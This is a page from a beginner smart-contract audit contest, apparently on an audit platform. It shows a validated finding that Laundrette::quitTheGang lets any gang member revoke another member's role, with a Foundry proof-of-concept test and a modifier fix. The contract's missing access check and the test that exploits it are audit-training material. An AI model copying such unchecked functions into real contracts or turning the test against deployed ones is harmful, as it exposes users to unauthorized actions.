First Flight #16: Mafia Takedown

First Flight #16

Beginner FriendlyDeFiFoundry

100 EXP

View results

Previous Next

Submission Details

Severity: medium

Valid

Any `GangMember` can be made to quit the gang by any other `GangMember`

codexbugmenot

Description

The Laundrette.sol has the function Laundrette::quitTheGang which can be called by any GangMember but there are no access control checks being made which check is the address passed to the function belongs to the caller or not.

Impact

Any GangMember can remove any other GangMember or even the godFather from the gang.

Proof of Concept

Poc to show any GangMember or the godFather can be made to quit the gang by any other GangMember .

Poc : Any Gang Member can remove others from the gang

function testAnyOneCameBeRemovedFromGang() public {

// the test contract is added to gang

joinGang(address(this));

// godFatherAlready joined so we just vm.prank him to add address(0) to gang

vm.prank(godFather);

laundrette.addToTheGang(address(0));

vm.assertEq(kernel.hasRole(address(0), Role.wrap("gangmember")), true);

vm.assertEq(kernel.hasRole(godFather, Role.wrap("gangmember")), true);

// test contract removes both godFather and address(0) from gang

laundrette.quitTheGang(address(0));

laundrette.quitTheGang(godFather);

vm.assertEq(kernel.hasRole(address(0), Role.wrap("gangmember")), false);

vm.assertEq(kernel.hasRole(godFather, Role.wrap("gangmember")), false);

}

Recommended Mitigation

Adding the Laundrette::isAuthorizedOrRevert modifier to the Laundrette::quitTheGang function will mitigate this issue

- function quitTheGang(address account) external onlyRole("gangmember") {

+ function quitTheGang(address account) external onlyRole("gangmember") isAuthorizedOrRevert(account) {

kernel.revokeRole(Role.wrap("gangmember"), account);

}

Updates

Lead Judging Commences

n0kto Lead Judge over 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

Gang members ban other members

Rewards breakdown

nSLOC

205

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.